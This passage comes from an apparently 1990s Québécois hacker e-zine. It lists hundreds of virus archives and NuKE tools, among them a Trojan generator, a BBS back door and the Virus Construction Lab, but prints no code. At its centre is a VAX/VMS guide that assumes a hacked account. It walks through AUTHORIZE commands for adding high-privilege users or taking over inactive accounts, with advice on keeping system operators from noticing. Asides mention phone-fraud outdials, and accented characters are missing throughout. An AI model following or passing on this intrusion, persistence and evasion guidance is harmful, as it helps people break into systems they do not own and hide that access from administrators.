.ZIP 1 50 Black Monday Virus [BMon] BOBINST .ZIP 12 50 Bob Ross Virus Installer v.99b BOBVIRUS.ZIP 8 50 Bob Virus [Bet] BOOKOVIR.ZIP 72 50 Book of Viruses (Various Virii) BOOT1 .ZIP 2 50 Boot 1 Virus (Ping Pong -B) [Ping] BOOT2 .ZIP 2 50 Boot 2 Virus BOYS .ZIP 0 50 Boys Virus [Boys] BRAINVRS.ZIP 0 50 Pakistani Brain Virus [Brain] BRENDA .ZIP 0 50 Brenda Virus [Tiny] BRN_ASH .ZIP 47 50 Brain Ashar Virus [Brain] BROTHER .ZIP 1 50 Brother Virus BUBBLE .ZIP 1 50 Bubble Virus (1244) [1244] BURGER@ .ZIP 4 50 Burger Virus [Burger] BURGR541.ZIP 2 50 Burger-541 Virus (Family-Q) [FQ] BUSH .ZIP 0 50 Bushishiro Virus [GenF][VHP] BUSTED .ZIP 0 50 Busted Virus [Bst] BUTSTINK.ZIP 4 50 Butt Stink Virus ( Who makes up these names? ) CANCER .ZIP 0 50 Cancer Virus [Pix] CANNAB2 .ZIP 0 50 Cannabis-2 CANSU .ZIP 0 50 Cansu/V-Sign Virus CAPTRIPS.ZIP 27 50 Captain Trips Virus [Jeru-A] CARIOCA .ZIP 1 50 Carioca Virus [Carioca] CASCADE .ZIP 1 50 Cascade Virus [170X] CASCDE-A.ZIP 4 50 Cascade (1701-A) Virus [170X] CASPER .ZIP 1 50 Casper Virus [Casper] CATMAN .ZIP 1 50 Catman Virus [Ctm] CAZ .ZIP 2 50 CAZ Virus [F-prot] CBOMBER .ZIP 12 50 Bomber Virus [Bmb] CD .ZIP 2 50 CD Virus [CD] CDM11 .ZIP 2 50 Cinco de Mayo 1.1 Infects COM B4 12:00 EXEs after :Cinco de Mayo virus. Infects COM files before noon :EXE files after noon and a surprise on May 5th. :[MPC]/[VCL] Hybrid CEMETARY.ZIP 3 50 Cemetary Virus [Pest] CHEEBA .ZIP 3 50 Cheeba Virus [Che][CHB] CHEESY .ZIP 0 50 Cheesy Virus CHNG-MPC.ZIP 2 50 Chuang Virus (MPC Production) [MPC] CHRONO .ZIP 3 50 Chrono Virus CHUANG .ZIP 1 50 Chuang Virus (VCL Production) [Con] VCL 5 CIA .ZIP 1 50 CIA Virus [Burger] CIA2 .ZIP 3 50 CIA Virus (Burger/Family-Q) [FQ] CINDER .ZIP 2 50 Cinderella Virus (FamS) [FS] CIVIL_4B.ZIP 4 50 Civil War 4B :Rewritten with TPE 1.3 CIVIL_4C.ZIP 2 50 Civil War 4C :Rewritten with TPE 1.3 CLONE .ZIP 18 50 Clone Virus (Jerusalem) [Jeru] CODEZERO.ZIP 0 50 Code Zero Virus COLUMBUS.ZIP 14 50 Columbus Virus COMDEX .ZIP 25 50 Comdex Virus COOKIE .ZIP 3 50 Cookie Virus COP-MPL .ZIP 2 50 Variation of Akuka COSSIGNA.ZIP 2 50 Cossigna Virus [1204] CRASH .ZIP 2 50 Crash Dummy Virus (VCL Product) [Con] VCL 5 CREEPER!.ZIP 2 50 Creeper Virus [Crp] CRF .ZIP 0 50 CRF Virus [Crf] CRIMEIIB.ZIP 1 50 DataCrime 2B Virus [Crime-2B] CRUMBLE .ZIP 2 50 Crummble Virus (Falling Letters) [Crm] CRYPTM .ZIP 8 50 CryptM Virus [Mut][DAME] CRZYEDIE.ZIP 1 50 Crazy Eddie Virus CVIRUS .ZIP 25 50 C Virus [CV] CVIRUS20.ZIP 11 50 C-Virus v2.0 (NuKE) CVIRUS21.ZIP 15 50 C-Virus v2.1 ( NuKE ) CVIRUS3 .ZIP 11 50 C-Virus v3 ( NuKE ) CW .ZIP 1 50 CW Virus (VirusDemo Clone) [Burger] CYBER101.ZIP 3 50 Cybertel v1.01 Virus CYBERTEL.ZIP 3 50 Cybernetic Intelligence Virus D-DANCE .ZIP 1 50 Devil's Dance Virus [Dance] D-FX .ZIP 2 50 Death F/X Virus [Blj] D-FX2 .ZIP 0 50 Death F/X ][ Virus DAMAGE .ZIP 2 50 Damage Virus [Alf] DAMIEN .ZIP 0 50 Damien Virus DARKAVEN.ZIP 1 50 Dark Avenger Virus [Dav] DARKLORD.ZIP 1 50 Dark Lord Virus [Ter] DARTH2 .ZIP 0 50 Darth Vader ][ Virus [512] DARTH4 .ZIP 0 50 Darth-4 Virus [512] DATACR-2.ZIP 2 50 DataCrime 2 [DC-2] DATACR-B.ZIP 2 50 DataCrime 1B [Crime] DATACRIM.ZIP 1 50 Datacrime Virus (1168) [Crime] DATALOCK.ZIP 1 50 DataLock Virus [Data] DATCRM2B.ZIP 1 50 DataCrime 2B Virus [C-2B] DAVEN-B .ZIP 1 50 Dark Avenger Virus, Strain B [Dav] DAVID .ZIP 1 50 David Virus [Alf] DBASE .ZIP 1 50 DBase Virus [Dbase] DBL_VISN.ZIP 5 50 Double Vision Virus DC-1168 .ZIP 1 50 DataCrime 1168 Virus [Crime] DC-B .ZIP 0 50 Death Cow Virus, Strain B DDAY10A .ZIP 3 50 Dooms Day V1.0A Virus DDRUS .ZIP 0 50 Ddrus Variant Of Vienna DEADLY .ZIP 10 50 Deadly Virus (Jerusalem) [Jeru] DEADPOOL.ZIP 1 50 DeadPool Virus DEATHCOW.ZIP 0 50 Deathcow Virus DEFINE .ZIP 0 50 Define Virus [Def] DEICIDE .ZIP 0 50 Deicide Virus [Dei] DELYRIUM.ZIP 1 50 Delyrium (Murphy Strain) [Murphy] DEMOLITN.ZIP 1 50 Demolition Virus [Dmo] DEMON .ZIP 0 50 Demon Virus [Demon] DENZUK .ZIP 5 50 Den Zuk Virus [DenZuk] DEST2 .ZIP 1 50 Dest ][ Virus [DES] DESTI .ZIP 3 50 Desti Virus DESTRUCT.ZIP 1 50 Destructor Virus [Destr] DHOG .ZIP 3 50 Define Virus [Def] DIABOLIK.ZIP 1 50 Diabolik Virus [Murphy] DIAMOND .ZIP 1 50 Diamond Virus [1024] DIOGENES.ZIP 3 50 DioGenes Virus (New VCL) DIR .ZIP 0 50 DIR Virus [DIR] DIRII .ZIP 1 50 Dir-2/FAT Virus [D2] DIRR .ZIP 3 50 DIR Virus DISKKILL.ZIP 0 50 Diskkiller Virus DODO .ZIP 0 50 Dodo (birdie) Virus [Dod] DODO-PIG.ZIP 0 50 Dodo-Pig (Dodo-407) [Dod] DOMEVIR .ZIP 29 50 DOME Virus With Sources DONOTH-B.ZIP 1 50 Do Nothing - B Virus [Not] DONOTHIN.ZIP 0 50 Do Nothing Virus [Nothing] DONTELLO.ZIP 1 50 Donatello Virus [VCL][Con] DOOMII .ZIP 1 50 Doom ][ Virus [Dm2] DOOMSDAY.ZIP 4 50 Doomsday Virus (Null/Scion) [Nl] DOTEATER.ZIP 1 50 DotEater Virus (Nina) [Nina] DOTKILL .ZIP 1 50 Dot Killer Virus [Dot] DR20 .ZIP 3 50 Data Rape 2.0 Virus DR22 .ZIP 6 50 Data Rape 2.2 Virus [Su2] DR23 .ZIP 2 50 Data Rape 2.3 Virus DRAPE-21.ZIP 0 50 Datarape v2.1 DROPPER2.ZIP 1 50 Dropper 2 Virus [Dr2] DROPSY .ZIP 3 50 Dropsy Virus (Timid) DRQUMAK .ZIP 1 50 Dr. Qumak Virus [Lisbon] DUMB .ZIP 8 50 Dumb Virus DURANGO .ZIP 6 50 Durango Virus (Viper/Leprosy) [Vip] DURBAN .ZIP 0 50 Durban Virus [Arma] DUTCH555.ZIP 0 50 Dutch 555 Virus [Dt] EAR .ZIP 2 50 Ear Virus [Ear] EARNESTO.ZIP 2 50 Earnesto Virus [UnScannable] EBV .ZIP 0 50 Eternal Blaze Virus EDV .ZIP 2 50 EDV Virus ELVIS .ZIP 1 50 Elvis Virus (Phalcon) EMF .ZIP 0 50 EMF Virus [Emf] EMFII .ZIP 0 50 EMF ][ Virus [Sr] ENCROAC2.ZIP 3 50 ENCROACHER 2-MtE, anti-CPAV, dirties files after din ENCROACH.ZIP 3 50 ENCROACHER - MtE-loaded anti-CPAV virus ENEMY .ZIP 1 50 Enemy Virus (Scr-2) [696] ENGLAND .ZIP 0 50 England Virus (334) [334] ENIGMA .ZIP 1 50 Enigma Virus [Enigma] ERASMUS .ZIP 1 50 Erasmus Virus (Murphy) [Murphy] EUROPE92.ZIP 1 50 Europe 92 Virus [E-92] EVIL .ZIP 2 50 Evil Virus [Plr] EVIL-D .ZIP 2 50 Evil-D Virus [Plr] EXPLODE .ARJ 1 50 Explode Virus (New Trivial) EXTERM .ZIP 0 50 Exterminator Virus [IB] FAKOFILE.ZIP 55 50 Dropper for VCL-Viriant [OW] FAMILY-N.ARJ 1 50 Family-N Virus [FN] FAMILY-Q.ARJ 0 50 Family-Q Virus [FQ] FATHERCH.ZIP 1 50 Father Christmas Virus [GenF][Lisbon] FEAR .ZIP 2 50 Fear Virus [Mut] FELLOW .ZIP 3 50 Fellowship Virus [fellow] FEXE10ER.ZIP 2 50 FEXE or 10ER virus - looks like a research virus FGT .ZIP 1 50 FGT Virus [FN] FIL .ZIP 2 50 Fil Virus [Fil] FILLER .ZIP 3 50 Filler Virus [Filler] FINGER .ZIP 1 50 Finger Virus [Murphy] FINN-709.ZIP 1 50 Finnish Virus (CSL Related) [CSL] FIRE-V .ZIP 3 50 Fire Virus FISH .ZIP 4 50 Fish Virus [Fish] FISH2 .ZIP 3 50 Fish ][ Virus [Fish] FLASH .ZIP 2 50 Flash Virus [Flash] FLEXITUP.ZIP 1 50 Flex Virus FLIP .ZIP 52 50 Flip Virus [Flip] FLIP2143.ZIP 5 50 Flip-2143 Virus [Flip] FLIP2343.ZIP 2 50 Flip-2343 Virus [Flip] FONER .ZIP 23 50 Foner Boot Virus FORM .ZIP 126 50 Form Virus - TD0 FRANCE .ZIP 1 50 France Virus (ZK900) [Z900] FREEW692.ZIP 1 50 FreeW Virus (Bob Viraint) [Bob] FRERE .ZIP 3 50 Frere Virus [Mule][Jeru] FREREJ .ZIP 1 50 Frere Jacques Virus [Mule][Jeru] FRIDAY .ZIP 4 50 Friday Virus (AntiCad/Plastique) [Plq] FRIENDS .ZIP 3 50 Friends Virus [ARCV] UnScaned COM FRODO .ZIP 3 50 Frodo Virus (4096) [4096] FROGS .ZIP 1 50 Frogs Virus [Frg] FUCKYOU .ZIP 0 50 Fuck You Virus [FW] FUMANCHU.ZIP 2 50 Fu Man Chu Virus [Fu] FUNKYKEY.ZIP 17 50 FunkyKey Virus FUTHARK .ZIP 2 50 Futhark Virus FVHS-A .ZIP 2 50 FVHS-A Virus (modified Leprosy) FVHS-B .ZIP 3 50 FVHS-B Virus (Modified Leprosy) G2-70B .ZIP 47 50 P/S Mass code producer GEE .ZIP 14 50 Gee Virus (number 1) [N1] GEEK .ZIP 1 50 Geek Virus GENERIC .ZIP 4 50 Family-Q Virus [FQ] GENESIS .ZIP 18 50 Genesis Virus GERGANA .ZIP 1 50 Gergana 182 Virus [Gerg] GHOST .ZIP 2 50 Ghostballs Virus (Family Virus) [FM] GIANTKLL.ZIP 6 50 Giant Kill Virus GOBLIN .ZIP 3 50 Goblin Virus (Cracker) [CRJ] GOOBER .ZIP 2 50 Goober Virus [Def] Define GOOBER2 .ZIP 0 50 Goober II Virus (VCL) [Con] VCL 2 GOTCHA1 .ZIP 1 50 gotcha-1 (A-Generation) [Gtc] GOTCHA4 .ZIP 1 50 Gotcha-4 (E Generation) [Gtc] GREEMLIN.ZIP 2 50 Diamond Greemlin Virus (Alfa) [Alf] GREEN .ZIP 1 50 Green Joker Virus [GRE] GREETING.ZIP 2 50 Greetings Virus GRITHER .ZIP 0 50 Grither Virus [GenF][Lisbon] GRLINKS .ZIP 3 50 Jerusalem Groen Links Virus [Jeru] GROUCH .ZIP 3 50 Grouch Virus (Timid Clone) [Tmd] GROUCH-E.ZIP 2 50 Grouch-E Virus (Timid Clone) [Tmd] GROUCH1 .ZIP 4 50 Grouch Virus (Timid Clone) [Tmd] GRUNT-1 .ZIP 2 50 Grunt-1 Virus [Grt-1] GRUNT2 .ZIP 2 50 Grunt-2 Virus UnScannable GRUNT4 .ZIP 2 50 Grunt-4 Virus UnScanable GUPPY .ZIP 1 50 Guppy Virus [Guppy] HACKTIC .ZIP 1 50 Tic Virus (109) [109] HAHA .ZIP 1 50 HaHa Virus [Sunday] HAIFA .ZIP 5 50 Haifa Virus [Hf] HALLOE .ZIP 5 50 Halloechen Virus [Hal] HAPPY .ZIP 4 50 Happy New Year Virus [HNY][Vor] HAPPY-N .ZIP 6 50 Happy N.Y Virus [HNY][Vor] HARAKI2 .ZIP 3 50 Harakiri Virus HARAKIRI.ZIP 6 50 Harakiri Virus HBT .ZIP 0 50 HBT Virus HEEVA .ZIP 52 50 Heeva Virus HEHHEH .ZIP 2 50 Heh Heh Virus (Timid Clone) [F-Prot] HERO .ZIP 0 50 Hero Virus [Hero] HH&H .ZIP 3 50 HH&H Virus HIDOS .ZIP 3 50 HiDos Virus [ARCV] UnScaned TSR-Boot HIGHLAND.ZIP 3 50 HighLander Virus HIV .ZIP 1 50 HiV Virus [Murphy] HIV-B .ZIP 1 50 Hiv Strain B HOLLAND .ZIP 1 50 Holland Girl Virus [Sylvia] HORSE-3 .ZIP 1 50 Horse-3 Virus [Hrs] HORSE-4 .ZIP 1 50 Horse-4 Virus [Hrs] HORSE-8 .ZIP 2 50 Horse-8 Virus [Hrs] HORSE2 .ZIP 1 50 Horse 2 Virus [Hrs] HORSE5 .ZIP 1 50 Horse 5 Virus [Hrs] HORSE6 .ZIP 1 50 Horse 6 Virus [Hrs] HR .ZIP 2 50 Hellraiser/Skism 18 Virus HUNGARY .ZIP 1 50 Hungary Virus [Hng] HYBRYD .ZIP 1 50 Hybryd Virus [Hyb] HYDRA-0 .ZIP 0 50 Hydra Strain 0 Virus [Pix] HYDRA-1 .ZIP 0 50 Hydra Strain 1 Virus [Pix] HYDRA-2 .ZIP 0 50 Hydra Strain 2 Virus [Pix] HYDRA-3 .ZIP 0 50 Hydra Strain 3 Virus [Pix] HYDRA-4 .ZIP 0 50 Hydra Strain 4 Virus [Pix] HYDRA-5 .ZIP 0 50 Hydra Strain 5 Virus [Pix] HYDRA-6 .ZIP 0 50 Hydra Strain 6 Virus [Pix] HYDRA-7 .ZIP 0 50 Hydra Strain 7 Virus [Pix] HYDRA-8 .ZIP 0 50 Hydra Strain 8 Virus [Pix] HYMN .ZIP 1 50 Hymn Virus [Hymn] HYMN2 .ZIP 2 50 Hymn ][ ( Sverdlov ) Virus [Sv] ICE-3 .ZIP 1 50 Icelandic III IGOR .ZIP 5 50 Igor Virus INCOM .ZIP 1 50 Incom Virus [Inc] INFINITI.ZIP 0 50 Infiniti Virus [GenF] INSUFF3 .ZIP 7 50 InStuff-3 equiped with MTE [MTE][DAME] INTRUDER.ZIP 1 50 Intruder INVADER .ZIP 2 50 Invader Virus [Invader] IRAQUI .ZIP 0 50 Iraqui Warrior Virus [Iwar] ISRAELI .ZIP 2 50 Israeli Virus [Jeru] ISRAELV .ZIP 0 50 Israel V Virus IT-PEST .ZIP 1 50 Cemetery Virus (Murphy) [Murphy] ITAVIR .ZIP 3 50 Itavir Virus ITTI .ZIP 0 50 Itti-Bitti Virus, Strains A & B (NuKE) J-INJECT.ZIP 8 50 Jerusalem Injector J4JV120 .ZIP 10 50 Jump For Joy v1.2 Virus JABERWOK.ZIP 2 50 Jabberwocky-812 Virus [Jab] JASMINE .ZIP 1 50 Jasmine Virus (MSK Clone) [MSK] JER-A204.ZIP 2 50 A-204 Virus (Jerusalem Varient) [Jeru] JERPUERT.ZIP 2 50 Puerto Rico Virus (Jeru Viriant) [Jeru] JERSPAIN.ZIP 1 50 Spanish Jerusalem Virus [Jeru] JERSULEM.ZIP 1 50 Jerusalem Virus [Jeru] JERU-A .ZIP 24 50 Jerusalem Virus Strain A [Jeru-A] JERU-B .ZIP 1 50 Jerusalem Virus, Strain B [Jeru] JERU-C .ZIP 2 50 Jerusalem Virus Strain C [Jeru] JERU1735.ZIP 1 50 Jerusalem-1735 JERU3 .ZIP 9 50 Jerusalem 3 Virus [Jeru] JERUB-3 .ZIP 1 50 Jerusalem Virus Stran B3 [Jeru] JERUB-I1.ZIP 1 50 Jerusalem (sUMsDOS-var) [Jeru] JERUB-I2.ZIP 3 50 Jerusalem B v2 Virus [Jeru] JERUB204.ZIP 1 50 Jerusalem (A-204) [Jeru] JFK .ZIP 11 50 JFK Virus (Frodo/4096) [4096] JO .ZIP 3 50 Joanna Virus [ARCV] [Joa] JOEXE .ZIP 2 50 Joanna Exersiser [ARCV] [Joa] JOJO .ZIP 4 50 JoJo Virus [170x] JOJO2 .ZIP 3 50 JoJo 2 Virus [170x] JOKER-01.ZIP 7 50 Joker-1 Virus [Joker] JOKER-02.ZIP 7 50 Joker-2 Virus [Joker] JOSHI .ZIP 10 50 Joshi Virus ( Teledisk ) [Joshi] JOSHIDRP.ZIP 12 50 Joshi Dropper [Drp] JOSHI_A .ZIP 4 50 Joshi-A Virus JO_V111 .ZIP 3 50 Joanna v1.1 Virus [ARCV] UnScaned TSR-COM JULY13 .ZIP 1 50 July 13th Virus JULY13 .ZIP 2 50 July The 13th Virus JUNE16TH.ZIP 1 50 June 16th Virus [Jun16] JUSTICE .ZIP 1 50 Justice Virus [Jus] KAMASYA .ZIP 2 50 Kamasya Virus [Pest] KAMIKAZE.ZIP 2 50 Kamikaze Virus [Kami] KEMEROV .ZIP 0 50 Kemerovo 257-A Virus [Kem] KENNEDY .ZIP 0 50 Dead Kennedy Virus [Tiny] KEYDROP .ZIP 2 50 KeyDrop Virus [Drp] KEYPRESS.ZIP 2 50 Keypress-1232 KIEV493 .ZIP 0 50 Kiev-493 Virus [Kiev] KILROY .ZIP 0 50 Kilroy Virus KINNNUKE.ZIP 6 50 Sam Kinnison Virus ( NuKE ) KKK .ZIP 6 50 Klu Klux Klan Virus KODE4V11.ZIP 0 50 Kode 4 virus v1.1 KODE4V3 .ZIP 0 5 Kode 4 v3.0 KOREA .ZIP 4 50 Korea Virus (TDO) [Korea] KUANG2 .ZIP 2 50 Kuang Grade Mark-11 Virus [Par] KYLIE .ZIP 2 50 Kylie Virus (Jerusalem) [Jeru] LABEL .ZIP 2 50 Label Virus [Label] LATE .ZIP 1 50 Late Night Virus LEECH .ZIP 1 50 Leech Virus [Leech] LEHIGH .ZIP 16 50 LeHigh Virus (Original) [LeHigh] LEHIGH2 .ZIP 23 50 Lehigh ][ Virus LEPRO-C1.ZIP 1 50 Leprosy-C1 [Lep3] LEPRO-C2.ZIP 1 50 Leprosy-C2 [Lep3] LEPROSY .ZIP 8 50 Leprosy Virus [RMIT] LEPROSYB.ZIP 12 50 Leprosy Virus, Strain B [LepB] LEPROSYC.ZIP 1 50 Leprosy Strain C LEPROSYD.ZIP 0 50 Leprosy Strain D LIBERTY .ZIP 3 50 Liberty Virus [Liberty] LIBERTY2.ZIP 3 50 Liberty-2 Virus [Liberty] LIGHT .ZIP 0 50 Lightning Virus LISBON .ZIP 0 50 Lisbon Virus [Lisbon] LISBON2 .ZIP 0 50 Lisbon 2 Virus [GenF][Lisbon] LOCK_UP .ZIP 0 50 Lock-Up Virus LOVECHLD.ZIP 0 50 Love Child Virus [LC] LOZ-1018.ZIP 1 50 Lozinsky 1018 Virus [Loz] LOZ-1023.ZIP 1 50 Lozinsky 1023 Virus [Loz] LOZINSKY.ZIP 2 50 Lozinsky Virus [Loz] LUCIFER4.ZIP 1 50 Lucifer v4.0 LUCIFR61.ZIP 0 50 Lucifer v6.1 LYTHYUM .ARJ 1 50 Lythyum Virus _16850 .ZIP 10 50 _16850 virus [C16] ------------ ------- 508 files 2137088 bytes total NukE produit aussi des programmes pour hackers et programmeurs de virii. On trouve entre autres dans leur arsenal original: [ NuKE Warez ] #7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Filename.Ext Bytes Description -------- --- ------- ------------------------------------------------------- BYPASS2 .ZIP 6 5 By Pass Trojan (Back maker for TG & Renegard) COM2 HPBOOK .ZIP 78208 - TSR DATABASE - To Store H/P infos NK-INFO1.ZIP 115712 NuKE Info-Journal #1 NK-INFO2.ZIP 79488 NuKE Info-Journal #2 :PW:514735 NK-INFO3.ZIP 142208 NuKE Info-Journal #3 :PW:POWER NK-INFO4.ZIP 65152 NuKE Info-Journal #4 :PW:PARTY NUKE-POX.ANS 2816 Special NuKE Pox v2.0 release ANSI from SSI & UPi!! NUKECTY2.GIF 22144 VGA for [NuKE] "NuKE City" (320x200x256) NUKECTY3.GIF 73984 VGA for [NuKE] "NuKE City" (640x480x256) NUKETYM .ZIP 2 5 NuKE's complete Tymnet OD/NUAs listing v6.2 NUTILS20.ZIP 111872 NoWhere Man Utilities, Has V1.0 + new ones of v2.0 NWHRVC .ZIP 25472 Expansion Kit for V.C.L. (NoWhereMan) TGBDR15 .ZIP 34688 Telegard Back Door TROG-V15.ZIP 36352 Trojan Generator VCL .ZIP 165376 Virus Construction Lab - By: Nowhere Man :PW: Chiba City :Must be installed in C:\VCL to work. ------------ ------- 15 files 963200 bytes total -= PAUSE =- Avis ceux qui se disent: "Hein? NuKE sortent des Warez? Je pensais que c'tait un groupe H/P/C/A/V ?!?" Ben, faites le lien entre les deux, pis a ressemble a... Tout le monde a droit l'ducation... Ct Virus, il y en a environ 1000-1100... Mieux que le 200 avec qui vous faites peur votre grand-mre... Concluons... En rsum, les valuateurs de NPC donnent deux pouces levs au Cybernetic Violence. On aime bien communiquer avec ce bab (WE'RE NOT WORTHY!). Pas pire du tout... Un des meilleurs dans le genre au Qubec... ou ailleurs. Pour toute question supplmentaire, quelle qu'elle soit, vous pouvez rejoindre un officier de Npc. Ils se feront surement un plaisir de vous rpondre... Pour le Numro, vous pouvez l'avoir sur n'importe quel bon bbs supportant le Hack/Phreak (Workshop, Screeming Revulsion, Coffin of Darkness)... Partant du principe que beaucoup d'entre nous, Qubcois, comptons nos sous pour les Ld (Sauf en Outdial ou par Code), il est, comme qui dirait, porte de ligne... Et bien meilleur que beaucoup de babs de pacotille aux Us... Bref: a vaut le coup d'appeler, surtout si vous trippez sur la programmation. Dormez en paix; la guerre dans le monde c'est pas pour tout de suite; Etc; Etc... IN VINO VERITAS NPC VOUS ENCOURAGE A NE PAS VOLER: BELL N'AIME PAS LA COMPETITION =Creating/Modifying Accounts on a VAX/VMS Operating System= =by Subhuman Punisher= The job of creating, modifying or deleting users is performed via the image AUTHORIZE. This program should be found in the sys$system directory. This job requires the SYSPRV privilege. To show the list of all the privileges your account is set up for, type: $ show proc/priv If you have the SYSPRV privilege, you can go on and add/modify/delete users. Typical accounts which have the SYSPRV privilege are SYSTEM, and FIELD. If your account has the SETPRV privilege, then you can add the SYSPRV privilege to your account by typing: $ set proc/priv=SYSPRV Assuming you have hacked out an account with the required privilege, then this is how you start up AUTHORIZE. $ sd sys$system ; change to sys$system directory $ run authorize ; self-explanatory This will return you the User Authorization File prompt (UAF from now on). UAF> The quick and dirty way to create a new user is: UAF> add [username] /password=[desired_pwd]/priv=[wanted_privileges] For example: UAF> add subhuman /password=whatever/priv=setprv would create a high-privileged user on a system. Of course, you should avoid adding new accounts when possible. The best idea would be to find an inactive user and to change his password to whatever you want. This way, the system operator won't get suspicious. You should also avoid granting all privileges to a particular user. This is very easy to detect from the operator's side. Here are the commands available from the AUTHORIZE program: ADD | Add a new user. See online help for further information. COPY | Allows you to copy any record in the UAF to a new user. CREATE | Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT | files if they don't already exist. DEFAULT| Allows you to change any item in the DEFAULT record in SYSUAF.DAT EXIT | Terminate authorize and go back to the VMS shell. GRANT | Grants an identifier name to a user UIC LIST | Makes a listing file (SYSUAF.LIS) which gives information | on the records specified. MODIFY | Allows you to modify an existing user. see below. REMOVE | This allows you to delete an existing user record RENAME | This allows you to change the username of a record REVOKE | Revokes an identifier name from a username or UIC identifier SHOW | Allows you to view the records in SYSUAF.DAT, RIGHTSLIST.DAT and | NETUAF.DAT The commands you will be using most from here are SHOW and MODIFY. Show can be used to isolate INACTIVE accounts (based on last login), failed login attempts etc. The MODIFY command will let you change any characteristic in any of the records. Below I will give a short discussion on some of the more important qualifiers that can be specified. Note that exactly the same thing applies to the ADD command: /ACCESS -if the account is set up for no remote access or whatever, just include this qualifier (no parameters) to gain FULL access. /DEFPRIV -your default privileges. These are the privileges that are active upon login /DIR -the directory assigned to you upon login. ie. SYS$LOGIN /LGICMD -the file that is executed upon login. Normal setting would be /LGICMD=login.com /PASSWORD -guess what? your password! /PRIORITY -CPU priority. /PRIV -privileges. see below for a list of all privileges. /PWDMIN -minimum password length /UIC -User Identification Code. Format: [group,member] On many systems you will find a file called ADDUSER.COM which allows the system manager to create new users. It is a DCL file which simplifies the task of creating new users by prompting you for all the necessary parameters. Below is a complete example of the command line. Just type HELP from the UAF> prompt if you are stuck. UAF> add DOEJ /own=John Doe /acco=john_doe /dir=SYS$LOGIN /uic=1, 34534,[privs] /passw=whatever The items here are: DOEJ -the name you will use on the system John Doe -your actual name (of course you don't use your REAL name!) john_doe -your account name, usually used for billing purposes SYS$LOGIN -your login directory. Best to keep an existing one 1,34534 -your User Id Code. format: [group,member] whatever -your account password. [privs] -your account privileges. See below for a complete list of all privileges available. SETPRV gives you manager access. type SHOW PROC/PRIV from the DCL prompt ($) to show your current privileges. PRIVILEGE DESCRIPTION ----------------------------------------------------------------------- --------- NONE no privilege at all NORMAL PRIVS ------------ MOUNT Execute mount volume QIO NETMBX Create network connections (*you need this to outdial!*) TMPMBX Create temporary mailbox GROUP PRIVS ----------- GROUP Control processes in the same group GRPPRV Group access through SYSTEM protection field DEVOUR PRIVS ------------ ACNT Disable accounting ALLSPOOL Allocate spooled devices BUGCHK Make bugcheck error log entries EXQUOTA Exceed disk quotas GRPNAM Insert group logical names n the name table PRMCEB Create/delete permanent common event flag clusters PRMGBL Create permanent global sections PRMMBX Create permanent mailboxes SHMEM Create/delete structures in shared memory SYSTEM PRIVS ------------ ALTPRI Set base priority higher that allotment OPER Perform operator functions PSWAPM Change process swap mode WORLD Control any process SECURITY Perform security related functions SHARE Access devices allocated to other users SYSLCK Lock system-wide resources FILES PRIVS ----------- DIAGNOSE Diagnose devices SYSGBL Create system wide global sections VOLPRO Override volume protection ALL PRIVS --------- BYPASS Disregard protection CMEXEC Change to executive mode CMKRNL Change to kernal mode DETACH Create detached processes of arbitrary UIC LOG_IO Issue logical I/O requests PFNMAP Map to specific physical pages PHY_IO Issue physical I/O requests READALL Possess read access to everything SETPRV *** ENABLE ALL PRIVILEGES!!! *** SYSNAM Insert system logical names in the name table SYSPRV Access objects through SYSTEM protection field. Great one. ============== DCL : Digital Command Language DEC : Digital Equipement Corporation VAX : Virtual Access eXtension VMS : Virtual Memory System ============== =The end= NOUS AVIONS JADIS UN MONOPOLE OU SONT PASSES LES VRAIS REBELLES? par BLITZKREIG C'est le retour de la chronique des anars, les mecs. C'est le territoire o vivent les cascadeurs de l'existence, les cingls du dterminisme, les tmraires qui n'coutent que la seule voix de leur conscience, celle qui dicte que le boutte du boutte dans la vie, mes fils, c'est de TOUJOURS faire en sorte que l'on puisse se regarder dans le miroir sans baisser les yeux, sans rougir de honte. Vivre sa vie sans faire de compromis, c'est possible. Ceci n'est plus une chronique sur les pionniers de l'underground au Qubec, c'est maintenant une tribune pour ceux qui ont compris le vrai sans de la vie. La rponse, mes amis, c'est de vivre sa vie sans lcher le cul d'un boss mprisant, en faisant un bras d'honneur aux conventions et aux considrations familiales. Moi, j'ai trouv des tas de mecs et de nanas pour qui le mot "compromis" n'existe pas... C'est ces marginaux de la norme que j'ai dcid de vous prsenter ici, mois aprs mois. Bien sr, il va y avoir des musiciens, des peintres, des sculpteurs; des artistes, quoi! Par dfinition, tre un artiste, c'est accepter de prendre des risques. C'est mme tout sauf un choix, prendre des risques, pour ces gens-l! Aller tudier au conservatoire de musique ou de thtre, c'est comme acheter un billet de 6\49 avec ta vie: seulement 10% des membres de l'Union des Artistes vivent au dessus du seuil de pauvret. Les autres ont jou le tout pour le tout... MAIS ILS N'ONT PAS PERDU, les mecs! Ils peuvent encore se regarder dans le miroir le matin, Dieu merci... Comme on vient de le voir, vivre sans compromis est une seconde nature pour la gent artistique. Mais il y a aussi des gens qui refusent une job dans l'entreprise de papa, ou qui refusent de lcher les culs de ceux qui dispensent avec parcimonie les emplois, gnralement ceux qui ont la langue la plus brune... On peut aussi vivre sans compromis quand on est acupuncteur, ou boucher, ou conducteur de poids-lourd, n'importe... La plupart de nos lecteurs, nous le savons, frquentent encore les institutions d'enseignement qui se spcialisent dans le lavage de cerveau: "Il y a un avenir pour vous en technologie de la transformation du minerai, jeune homme. La grappe industrielle n'est pas encore remplie..." Plutt que d'couter ces cons d'orienteurs, qui ne sont pas l pour vous aider, je vous le jure, mais bien plutt pour aider la socit remplir les "crneaux" vacants, pourquoi ne pas couter la voix en dedans de vous? Vous savez, celle qui vous dit: "Fais-toi plaisir, fais ce que tu as envie de faire! Ne gches-pas ta vie faire une job merdique pendant trente ans, une job que tu vas har chaque minute de ta vie! Fais ce que tu as VRAIMENT envie de faire!" Ce qui vous branche, ce qui vous clate, va srement faire de vous des gens plus panouis que si vous vous destiniez seulement trouver une job o on fait du cash... Pensez-y, les kids: vous avez le choix entre le boulot-rouleau-compresseur, ou une vie sur le fil du rasoir, mais o vous serez encore capables de vivre avec vous mme et de vous aimer un peu, bordel... CASE IN POINT... Notre rebelle, ce mois-ci, s'appelle Daniel Rochette. Non, ce n'est pas un handle, c'est le vrai nom d'une vraie personne, en chair et en os, un vrai rebelle qui a dcid que personne n'avait le droit de dcider de la conduite de sa vie, hormis lui... Daniel est disc-jockey de son tat. Mais pas N'IMPORTE LEQUEL D.J.: c'est le meilleur! L'entrevue s'est droule sur trois soirs: 15 heures d'entrevue, les mecs! 